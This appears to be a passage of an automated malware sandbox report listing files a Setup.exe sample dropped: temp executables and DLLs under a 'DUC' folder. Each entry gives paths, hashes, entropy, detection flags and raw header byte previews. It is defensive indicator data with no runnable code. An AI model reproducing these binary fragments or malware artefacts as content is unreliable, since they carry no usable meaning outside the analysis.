                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdknf44b.5sv.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\a11818c7

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1049549
                                                                                                                                                          Entropy (8bit):7.556875747302201
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:pSszeJzbiUDrxN0a4Qp6JVfYcQtCBGQ0ZL:pS2euUDKVfYH06ZL
                                                                                                                                                          MD5:82F291720EFA338F6559E5AB2FD24570
                                                                                                                                                          SHA1:F2BB575ADB8355C6C919B6CA26B3D427476C6A1E
                                                                                                                                                          SHA-256:FA214794DD620A7338859C4A4C22C67144C89FCD69A7685F18C308831166D119
                                                                                                                                                          SHA-512:810F6B613CD52565C18EDB393BF7F3066D8F6D1C5AEF2CC52A55146B7F90BF6F2796CA364545CC23A375A795B322788824C2AB2260949F74C5EB5C8CB8933C5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^..&^..~...z...c7..A-..Z...@:..]...O,..c;..r...I,..]...O,..^^...^...^...^...^...^...^...^...^...^...^...^..g0..G?..T;...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^..m,..Z;..]*..M;...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^..g...|{..G=..]1......r...C;..\5...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...n...i...^...^...^...^...^...^...^...^...^...^...^

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\accpl

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\SysWOW64\more.com
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):317952
                                                                                                                                                          Entropy (8bit):6.814759824094587
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:KfSVaPPWOWB0LcVL+oKMFgB7EmSS2CCiPhB5XSv1HNM853:9aPPWOWB0w1+oKogBYZvUzsBNM853
                                                                                                                                                          MD5:DE112F0273EFC66142E398EE8D51434C
                                                                                                                                                          SHA1:B0C8BB0D5D9A0A8D52BDA89C0DFCCB15EBF3E871
                                                                                                                                                          SHA-256:20488C1EC1CD4AA44E058FD02721486E51F30DCD9814BD778E3EE34BFCC06D79
                                                                                                                                                          SHA-512:ED81E9BF794BF87EDFA69E480188A980643F383FDB8140A3E149FBA482FD32C829A9FF98E063B864709348826382425772BFD0A71BE48912E8DF2FAD623AA9D6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Z.Q..........................................@.......................................@..................................;...............................`...>...................................................=...............................text............................... ..`.rdata... ... ..."..................@..@.data...l....P...Z..................@....CRT.........P......................@..@.reloc...>...`...@..................@..Byicvgb..............................@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ktb

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\SysWOW64\more.com
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):317952
                                                                                                                                                          Entropy (8bit):6.814759824094587
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:KfSVaPPWOWB0LcVL+oKMFgB7EmSS2CCiPhB5XSv1HNM853:9aPPWOWB0w1+oKogBYZvUzsBNM853
                                                                                                                                                          MD5:DE112F0273EFC66142E398EE8D51434C
                                                                                                                                                          SHA1:B0C8BB0D5D9A0A8D52BDA89C0DFCCB15EBF3E871
                                                                                                                                                          SHA-256:20488C1EC1CD4AA44E058FD02721486E51F30DCD9814BD778E3EE34BFCC06D79
                                                                                                                                                          SHA-512:ED81E9BF794BF87EDFA69E480188A980643F383FDB8140A3E149FBA482FD32C829A9FF98E063B864709348826382425772BFD0A71BE48912E8DF2FAD623AA9D6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Z.Q..........................................@.......................................@..................................;...............................`...>...................................................=...............................text............................... ..`.rdata... ... ..."..................@..@.data...l....P...Z..................@....CRT.........P......................@..@.reloc...>...`...@..................@..Byicvgb..............................@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\Qt5Core.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6270976
                                                                                                                                                          Entropy (8bit):6.672220413310173
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:UE5jJSnL0VxTOnyJJsv6tWKFdu9Cs/CzYnxqfDgw:UE5NSn0xrJJsv6tWKFdu9CMkexqfDF
                                                                                                                                                          MD5:65CA5D5EFCB36677F934B96F40FED552
                                                                                                                                                          SHA1:34A433C41B11D809E3B3B59C2F4030D1E3D94782
                                                                                                                                                          SHA-256:0AED0AE4B0631EB3EA9AD348B4E2F6276312192B8391A44209113668911596E0
                                                                                                                                                          SHA-512:F28707F05D23B866E7E71173E82A7F0C799F4C3CAADEF4F8B9B9D9EC78466F98F93755D987F4DE6C75551C7DCB47703CDC2CC718DE156FBD52107D78C7888C49
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........*.7.Kfd.Kfd.Kfd.3.d.Kfd.#ge.Kfdx.d.Kfd.#ce.Kfd.#be.Kfd.#ee.Kfd.#be.Kfd.#`e.Kfd.#ge.Kfd.Kgd.Jfdx"be.Kfdx"ce.Kfdx"fe.Kfdx".d.Kfd.K.d.Kfdx"de.KfdRich.Kfd........PE..d...}).a.........." .....r/...0.....P+.......................................``...........`...........................................P..N....X...... `.......Y..-...........0`.Z&....K.T...................p.K.(...p.K.............../.0............................text....p/......r/................. ..`.rdata...(.../...(..v/.............@..@.data........0X..V....X.............@....pdata...-....Y......fX.............@..@.qtmimed.....0[.......Z.............@..P.rsrc........ `......._.............@..@.reloc..\&...0`..(...._.............@..B........................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\Qt5Network.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1389568
                                                                                                                                                          Entropy (8bit):6.4031070456368
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:HO51NG2bq1mhQpCR4SSUVxiKZiva+su3pUlSuMEFR+PoT0lqU:34hQoRpSUVYKZqvsu3pUlNMEePoT0E
                                                                                                                                                          MD5:C24C89879410889DF656E3A961C59BCC
                                                                                                                                                          SHA1:25A9E4E545E86B0A5FE14EE0147746667892FABD
                                                                                                                                                          SHA-256:739BEDCFC8EB860927EB2057474BE5B39518AAAA6703F9F85307A432FA1F236E
                                                                                                                                                          SHA-512:0542C431049E4FD40619579062D206396BEF2F6DADADBF9294619C918B9E6C96634DCD404B78C6045974295126EC35DD842C6EC8F42279D9598B57A751CD0034
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Z..q.n.".n.".n."...".n."E.{#.n."L.{#.n."L.|#.n."L.z#.n."L.~#.n."E.~#.n."..~#.n.".n~".j."..z#.n."...#.n."...".n.".n.".n."..}#.n."Rich.n."........................PE..d....).a.........." .....p...........h....................................................`..............................................n...L..@....p.......p..x.......................T...................@...(...@...................H ...........................text....n.......p.................. ..`.rdata..X............t..............@..@.data...8Q.......$..................@....pdata..x....p.......&..............@..@.rsrc........p......................@..@.reloc............... ..............@..B................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\gcrv

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):23966
                                                                                                                                                          Entropy (8bit):5.51352959157031
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:vp7uhvldPVDiktgppK0deSS88H69o67ZkZxDJoeHDsqfKtXZqhSbpKafCQN3dMsd:x69ldN+ugppK0d1S7HB6lSxDSe0tXZq+
                                                                                                                                                          MD5:D3DBC9E34960169C38554935FEE7E2A5
                                                                                                                                                          SHA1:B0EE82E4293ED4237A0D9ECD90EB91B99694F6B6
                                                                                                                                                          SHA-256:86C72C5EE6DE1DFCC3ED7E52A39DD2692B00C4EBF966B30A94F12C18BEDE0377
                                                                                                                                                          SHA-512:7509D56A0A4F33CE39724C38AB926C113C01D6BCF314F3F4E62513AC43AC1274A34B62AB6063B0F0C0DB8AFD2D1BA6578F6F873BAC4A9E9D0644A890B0EC49EC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:N...gR..Cpy.d_]bhLuwn._.Lgbop].g\Q....ZH.^q.t.o.a.j.[...N....k.R.vPj..`..R_...xjs..y..r.w..v.h..lVR....t.G.p]q....o...mMs....k..cv..Sxw.U..E.....LZcZH..M...n.f.....Dm....H..k[.M...y..UA\w.u.Gg....]..\.l.....TI.OL].]IdOC...Jx^....Ju..[.R.O.F..].EB.....J.in.....c.s..]..B.n..gw.f..l.P..s...dN.se.dBB.`w.X...w^_..`UJATrLe.v.p.]hk.Eq...V.J.t..Jh..Ve[.wBe..EJ._.dm..Ev.V..Z..M..Db.O`vDs.bg..FZEEpZ..Q.S...B.N..a.J....hA...Zlrrr..LbR.wt.aC.[......k..D.B...Nc.wva..K.a_vdMD.qikE..u.jDa.q..h......F..g.\j...H..JPZ.G..U....h.qT....uHE.....Bq.brI...^d.M..YE.V.....PW..xJZ.D.EJG.WE..g.g...Gk.l.x.dIg`.....ln.y....bMhGg.OgsE....tu.\.`..k.K.r.Fx`..RFC\W..l.AG.FJ.h......o_._..N..PUH\.\..xunW.UG..X`M..gi`...DU...cp..ZAvp.YA.D.....M.a.sPZ..XWSA..iG.k.A.GAk...l].wZ.......t...M....w.fbg....]e.Z.Uq..MmX....c..sh.w....l_.uq..u....J.ToQpO..rDaRyg.D.a.....B....UW...v.oyH.G.L..[.lQ......Br..I..QD..Bc....Aj_.eE.X^jC.iwQ.....A.HX..c]...T.R\.P...hSDBS...Rb...M.M......_....S\`.k....N...SV.HY.d....wr..x`Cm.qp.Tk..I^Hx..[

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2849280
                                                                                                                                                          Entropy (8bit):5.898395689897465
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:KlOh5PuX2I9Rkf5gnQ7duzGuqFCtLQ2IqNPz38JQ41CPwDv3uFfJ:Q2Irkn2Iqt38C41CPwDv3uFfJ
                                                                                                                                                          MD5:28DEA3E780552EB5C53B3B9B1F556628
                                                                                                                                                          SHA1:55DCCD5B30CE0363E8EBDFEB1CCA38D1289748B8
                                                                                                                                                          SHA-256:52415829D85C06DF8724A3D3D00C98F12BEABF5D6F3CBAD919EC8000841A86E8
                                                                                                                                                          SHA-512:19DFE5F71901E43EA34D257F693AE1A36433DBDBCD7C9440D9B0F9EEA24DE65C4A8FE332F7B88144E1A719A6BA791C2048B4DD3E5B1ED0FDD4C813603AD35112
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: 4OVYJHCTFA.exe, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OKkQ.%8Q.%8Q.%8XV.8C.%8.F$9S.%8.F 9Z.%8.F!9Y.%8.F&9R.%8EE$9Z.%8Q.$8..%8.G&9P.%8.G!9.,%8.G%9P.%8.G.8P.%8.G'9P.%8RichQ.%8................PE..d...._.c.........." .................q.......................................0,...........`.........................................`.&..h...j+.@.....+.|.....).t.............+.pN...=$.8............................=$..............`+..............................text...g........................... ..`.rdata..{....0......................@..@.data...aw... )..*....(.............@....pdata........)......&).............@..@.idata..."...`+..$....*.............@..@.00cfg........+.......*.............@..@.rsrc...|.....+.......+.............@..@.reloc...q....+..r....+.............@..B........................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\libssl-1_1-x64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):685056
                                                                                                                                                          Entropy (8bit):5.49393422013168
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:PcPPRr7K55yAAKDNkk1+cFc+CmRkS9/+wDe1rlXiE4D9u3AG3UQjA5WU2lvz:2N43+cFcmYhXixo7708U2lvz
                                                                                                                                                          MD5:4AD03043A32E9A1EF64115FC1ACE5787
                                                                                                                                                          SHA1:352E0E3A628C8626CFF7EED348221E889F6A25C4
                                                                                                                                                          SHA-256:A0E43CBC4A2D8D39F225ABD91980001B7B2B5001E8B2B8292537AE39B17B85D1
                                                                                                                                                          SHA-512:EDFAE3660A5F19A9DEDA0375EFBA7261D211A74F1D8B6BF1A8440FED4619C4B747ACA8301D221FD91230E7AF1DAB73123707CC6EDA90E53EB8B6B80872689BA6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5,5.qM[TqM[TqM[Tx5.T}M[T#%ZUsM[Te&ZUsM[T#%^UzM[T#%_UyM[T#%XUrM[T.$ZUrM[TqMZT.L[T.$_U]M[T.$[UpM[T.$.TpM[T.$YUpM[TRichqM[T........PE..d....`.c.........." .....0...J.......%....................................................`..............................................N..(5..........s.......DL..............\.......8............................................ ..(............................text............0.................. ..`.rdata...&...@...(...4..............@..@.data...!M...p...D...\..............@....pdata...U.......V..................@..@.idata...V... ...X..................@..@.00cfg...............N..............@..@.rsrc...s............P..............@..@.reloc..@............X..............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\msvcp140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):578384
                                                                                                                                                          Entropy (8bit):6.524580849411757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:RBSNvy11qsslnxU/1ceqHiNHlOp/2M+UHHZpDLO+r2VhQEKZm+jWodEEVAdm:RBSDOFQEKZm+jWodEE2dm
                                                                                                                                                          MD5:1BA6D1CF0508775096F9E121A24E5863
                                                                                                                                                          SHA1:DF552810D779476610DA3C8B956CC921ED6C91AE
                                                                                                                                                          SHA-256:74892D9B4028C05DEBAF0B9B5D9DC6D22F7956FA7D7EEE00C681318C26792823
                                                                                                                                                          SHA-512:9887D9F5838AA1555EA87968E014EDFE2F7747F138F1B551D1F609BC1D5D8214A5FDAB0D76FCAC98864C1DA5EB81405CA373B2A30CB12203C011D89EA6D069AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f..f..f.....d..o.A.p..f........c.....n.....b...........g....-.g.....g..Richf..........................PE..d................." ...$.F...V......`1....................................................`A........................................PB..h.......,................9......PO......8...p...p...........................0...@............`...............................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data....8...@......................@....pdata...9.......:...<..............@..@.rsrc................v..............@..@.reloc..8............z..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\msvcp140_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35704
                                                                                                                                                          Entropy (8bit):6.591016227549893
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:z1vZLMtUYqOoKFYpWcm5gW/ki0pSt+eB+Hj+R9zUkUTRtHRN7SoHR9zui5TJ:zpCtzqOjKYWi0QKHji9zSRtnx9zJTJ
                                                                                                                                                          MD5:69D96E09A54FBC5CF92A0E084AB33856
                                                                                                                                                          SHA1:B4629D51B5C4D8D78CCB3370B40A850F735B8949
                                                                                                                                                          SHA-256:A3A1199DE32BBBC8318EC33E2E1CE556247D012851E4B367FE853A51E74CE4EE
                                                                                                                                                          SHA-512:2087827137C473CDBEC87789361ED34FAD88C9FE80EF86B54E72AEA891D91AF50B17B7A603F9AE2060B3089CE9966FAD6D7FBE22DEE980C07ED491A75503F2CF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x. c<.N0<.N0<.N0..O1>.N05..08.N0..J1;.N0..M1>.N0<.O0..N0..O19.N0..K1(.N0..N1=.N0..0=.N0..L1=.N0Rich<.N0........PE..d...E.b..........." ...$.....&.......................................................<....`A.........................................?..L...<A..x....p.......`.......<..xO...........4..p...........................`3..@............0..8............................text............................... ..`.rdata..2....0......................@..@.data........P......................@....pdata.......`.......2..............@..@.rsrc........p.......6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\sbiupg

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):806258
                                                                                                                                                          Entropy (8bit):7.867340280444731
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:fAgXTn9UMGNIdYP3lxAvcQrqUr85Bk9/VGzxhQ:ffLFyxdBKgznQ
                                                                                                                                                          MD5:38BE7366796E12E9DDAD7B3F244B401B
                                                                                                                                                          SHA1:59C6000B886D831E88BFA80DAC222B03FBF3F193
                                                                                                                                                          SHA-256:CBAD28D0A414B7C247CBF2891BF5FC3CA7939DDC74A4AE0E4C623AD3604C8A8D
                                                                                                                                                          SHA-512:810056EB3FC5F2021561A0B79543E893595E89444B8EC62F9AA1C67393548733645E7DA93F102D2CF203ABC1622CEA9C879DB5D06CFF71A497C3339001B99F9E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.J.S...j...F.].....ttp..\.CQ..rjoQVM......Q.M.NHYL...tI.CoL.mh.V..B.U.f.xT.i.y^..TRmS.tf...Ym.DrSB.......\R....AO.G.UxjlPJ[hQeA.\..KLmph..v[...[..Lnr..._`N.U.Dt.MP.hC.]O]W..CZ...x.JD....i....dVj...._..hkmi.q...ijl\..R_S......j......ZS...s.yL...h..gr.e..pC.n....Hcq.]X..f..L.l.vnR.r.[.........u.._.q.g.M..b....^B\...K..a..`so........Ch...jiRm.^Y.UYOa.N......cjpZ..YS.O.TpV...lQ...E....YD..tVjvdw..[Y..]....aH....L[........tx....K...p.....Ga.h]i.NyNuAiu....Bi`ki.H......frp.TvYT..fV..uJQ.gRu.xN.[w..V.........b..y....ada.\.LX...B....lyU.`....U..kKC....R..AU..`......bl..q\.XLh\W]ON`.O..Y.iO.pm.\..VH.m..a.IEMn.`k..Gk.[t.kh.CV.Dp.VZ.S..vo...Lf...B.qI..f.t..AW_.k...mn......[D.U...OC....Oxq....v..CeaV.yNX.u...wHj..o...i.D.B.v.H.PQfBe.T...F..`...B...F.T.`Z...XfX......q.h....N.v.^..Ur.x...Fu....t..sYQ.Ou....OwMe.F..s..C.f.ib.c..O.Z..R`.S[.CQeMhd...W.Sp.r...S..md.Me.A.f...n\oj...bq..V...mS.b.wP.^rQ..b.H.Sc^a.JX..TF..mO.vh.E^smpA..Z.c.........X..ud..X..MG.Z...e.j.CIR.i.....J..x.nQ..J..HaJ.hT.gM..f...fn

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\steam_api64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):298384
                                                                                                                                                          Entropy (8bit):6.4905956879024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:504VEQ2u/niy9UVLCe9ZqdrP+VXvv+sJYB2RHKBi65lhTbCc+hnvvEyP7yq+uei1:QZu/i874ZcrMv2cRh7yqO2CPLHxYq8/B
                                                                                                                                                          MD5:6B4AB6E60364C55F18A56A39021B74A6
                                                                                                                                                          SHA1:39CAC2889D8CA497EE0D8434FC9F6966F18FA336
                                                                                                                                                          SHA-256:1DB3FD414039D3E5815A5721925DD2E0A3A9F2549603C6CAB7C49B84966A1AF3
                                                                                                                                                          SHA-512:C08DE8C6E331D13DFE868AB340E41552FC49123A9F782A5A63B95795D5D979E68B5A6AB171153978679C0791DC3E3809C883471A05864041CE60B240CCDD4C21
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@.......................................VLV......`...%.bZf........R...%j..6../N..'...%.]1B3...+..6..'..6...wFA.}l?...K..L.MN.t.....f.sD&f......x.I...K.mP..P..\G.3.b..X...6.e.>L................................................................PE..d....%.b.........." .....`..........P.........@;..........................................`.........................................`7..........P............`...#...`...-......T.......T.......................(...0...8............p...............................text...._.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata...#...`...$...*..............@..@_RDATA...............N..............@..@.rsrc................P..............@..@.reloc..T............X..............@..B........................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\vcruntime140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):109440
                                                                                                                                                          Entropy (8bit):6.642252418996898
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
                                                                                                                                                          MD5:49C96CECDA5C6C660A107D378FDFC3D4
                                                                                                                                                          SHA1:00149B7A66723E3F0310F139489FE172F818CA8E
                                                                                                                                                          SHA-256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
                                                                                                                                                          SHA-512:E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\DUC\vcruntime140_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):49560
                                                                                                                                                          Entropy (8bit):6.6649899041961875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:a0Q4HUcGJZekJSam1BbuBSYcCZbiLzlSHji9z4GwZHji9znwT:afnDex5izbiLzlE+z4Gwl+zwT
                                                                                                                                                          MD5:CF0A1C4776FFE23ADA5E570FC36E39FE
                                                                                                                                                          SHA1:2050FADECC11550AD9BDE0B542BCF87E19D37F1A
                                                                                                                                                          SHA-256:6FD366A691ED68430BCD0A3DE3D8D19A0CB2102952BFC140BBEF4354ED082C47
                                                                                                                                                          SHA-512:D95CD98D22CA048D0FC5BCA551C9DB13D6FA705F6AF120BBBB621CF2B30284BFDC7320D0A819BB26DAB1E0A46253CC311A370BED4EF72ECB60C69791ED720168
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V...V...V......T.......T..._.D.]...V...e.......S.......Q.......M.......W.....(.W.......W...RichV...........PE..d...}.4..........." ...$.<...8.......A..............................................e4....`A........................................0m.......m..x....................r...O......D....c..p...........................pb..@............P..h............................text...@:.......<.................. ..`.rdata..."...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\HuXYHwrC.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35274003
                                                                                                                                                          Entropy (8bit):7.9959854903115115
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:786432:JUsWOp0Bt8ipedewoc623Rqa3YbUVa2X2kJK2SjGAirtoyRy:QOqByiuew0gotUVVXm2JAi5Jy
                                                                                                                                                          MD5:867537F1E2F91E74C68EAF029F21479B
